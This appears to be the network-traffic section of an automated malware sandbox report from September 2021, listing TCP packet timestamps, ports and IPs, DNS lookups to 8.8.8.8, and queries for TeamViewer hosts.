                                                                                                      Sep 15, 2021 13:46:45.320075989 CEST4434982745.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:45.984426975 CEST4434982745.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:45.984642029 CEST49827443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:45.984673023 CEST4434982745.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:45.984751940 CEST49827443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:45.984764099 CEST4434982745.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:45.984813929 CEST49827443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:45.985090017 CEST49827443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:45.988090038 CEST4434982745.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:45.988188982 CEST49827443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.343605995 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.343657017 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.343753099 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.344738007 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.344749928 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.405122042 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.405203104 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.405983925 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.406006098 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.406653881 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.406663895 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.406905890 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.406917095 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407013893 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407023907 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407190084 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407212019 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407315016 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407331944 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407391071 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407403946 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407418013 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407427073 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407530069 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407546997 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407790899 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407804012 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:46.407901049 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:46.407908916 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.091037035 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.092071056 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.092098951 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.092173100 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.092401028 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.096273899 CEST4434982845.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.100373030 CEST49828443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.700448036 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.700505018 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.700732946 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.701617002 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.701633930 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.780121088 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.780293941 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.781362057 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.781372070 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.782423973 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.782433033 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.783035040 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.783042908 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.783333063 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.783341885 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.783670902 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.783689976 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.783773899 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.783781052 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.783934116 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.783943892 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.784323931 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.784337997 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.784539938 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.784549952 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.784744978 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.784755945 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:47.784876108 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:47.784883976 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:48.577106953 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:48.577433109 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.577471972 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:48.577721119 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.578047037 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.585115910 CEST4434982945.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:48.585269928 CEST49829443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.994993925 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.995044947 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:48.995156050 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.996515036 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:48.996536970 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.050097942 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.050209999 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.051168919 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.051186085 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.052436113 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.052452087 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.052856922 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.052867889 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.052983999 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.052992105 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053177118 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053205967 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053303957 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053312063 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053328037 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053338051 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053349972 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053359032 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053457022 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053474903 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053605080 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053622007 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053749084 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053765059 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.053857088 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.053864956 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.702349901 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.702564001 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.702583075 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.702716112 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.703078032 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:49.703696012 CEST4434983045.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:49.703819036 CEST49830443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.110505104 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.110569954 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.110902071 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.112376928 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.112397909 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.215702057 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.215795040 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.216631889 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.216641903 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217410088 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217422009 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217530966 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217539072 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217655897 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217663050 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217833996 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217850924 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217911959 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217916965 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.217971087 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.217986107 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.218118906 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.218136072 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.218250990 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.218264103 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.218383074 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.218394041 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.218483925 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.218491077 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.894865990 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.894978046 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.895005941 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.895826101 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.895929098 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:50.896274090 CEST4434983145.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:50.896339893 CEST49831443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.286236048 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.286288023 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.286407948 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.287185907 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.287211895 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.343111038 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.343240976 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.344424009 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.344444990 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.345812082 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.345830917 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.346436024 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.346446037 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.346885920 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.346895933 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.347337008 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.347354889 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.347493887 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.347501993 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.347589016 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.347609043 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.347814083 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.347829103 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.348011971 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.348026037 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.348321915 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.348332882 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:51.348371983 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:51.348380089 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.083714008 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.083959103 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.083992958 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.084100962 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.084332943 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.087244987 CEST4434983245.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.087399960 CEST49832443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.567785978 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.567846060 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.567928076 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.568753004 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.568768978 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.625849009 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.625972986 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.627379894 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.627398014 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.628467083 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.628473997 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.628793955 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.628799915 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.629017115 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.629021883 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.629345894 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.629364967 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.629475117 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.629481077 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.629601955 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.629615068 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.629951954 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.629964113 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.630207062 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.630220890 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.630422115 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.630429983 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:52.630599022 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:52.630604982 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.392363071 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.392504930 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.392525911 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.392582893 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.393129110 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.395936966 CEST4434983345.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.396040916 CEST49833443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.859643936 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.859682083 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.859770060 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.860872030 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.860884905 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.983469963 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994184017 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994195938 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994210005 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994235992 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994242907 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994246006 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994251966 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994254112 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994257927 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994282007 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994297028 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994447947 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994460106 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994529963 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994549036 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994556904 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994561911 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994673967 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994724989 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:53.994832039 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:53.994961977 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.380294085 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.380390882 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.380408049 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.380460024 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.380709887 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.384177923 CEST4434983445.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.384288073 CEST49834443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.697657108 CEST49835443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.697721958 CEST4434983545.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.697803974 CEST49835443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.698050022 CEST49835443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:46:55.698076010 CEST4434983545.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.755249023 CEST4434983545.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:46:55.755403996 CEST49835443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:47:02.910207987 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:47:02.911701918 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:47:16.910574913 CEST4434983545.153.241.148192.168.2.3
                                                                                                      Sep 15, 2021 13:47:16.910715103 CEST49835443192.168.2.345.153.241.148
                                                                                                      Sep 15, 2021 13:47:27.900511980 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:47:27.912023067 CEST4975180192.168.2.3188.172.198.151

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 15, 2021 13:45:07.951766014 CEST5754453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:08.003196955 CEST53575448.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:13.472592115 CEST5598453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:13.513010979 CEST53559848.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:18.363656998 CEST6418553192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:18.400454998 CEST53641858.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:20.264966965 CEST6511053192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:20.292700052 CEST53651108.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.015845060 CEST5836153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:21.047782898 CEST53583618.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:23.053232908 CEST6349253192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:23.120400906 CEST53634928.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:31.937289000 CEST6083153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:31.974164963 CEST53608318.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:40.243851900 CEST6010053192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:40.272849083 CEST53601008.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:51.775049925 CEST5319553192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:51.807053089 CEST53531958.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:46:26.363526106 CEST5014153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:46:26.406059980 CEST53501418.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:46:28.347310066 CEST5302353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:46:28.397870064 CEST53530238.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:31.724908113 CEST4956353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:31.786111116 CEST53495638.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:34.873775959 CEST5135253192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:34.903615952 CEST53513528.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:37.876111031 CEST5934953192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:37.909280062 CEST53593498.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:41.422475100 CEST5708453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:41.474040031 CEST53570848.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:44.051457882 CEST5882353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:44.076170921 CEST53588238.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:47.365585089 CEST5756853192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:47.395354986 CEST53575688.8.8.8192.168.2.3

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Sep 15, 2021 13:45:18.363656998 CEST192.168.2.38.8.8.80x4384Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:20.264966965 CEST192.168.2.38.8.8.80xf98dStandard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:21.015845060 CEST192.168.2.38.8.8.80x7997Standard query (0)master12.teamviewer.comA (IP address)IN (0x0001)
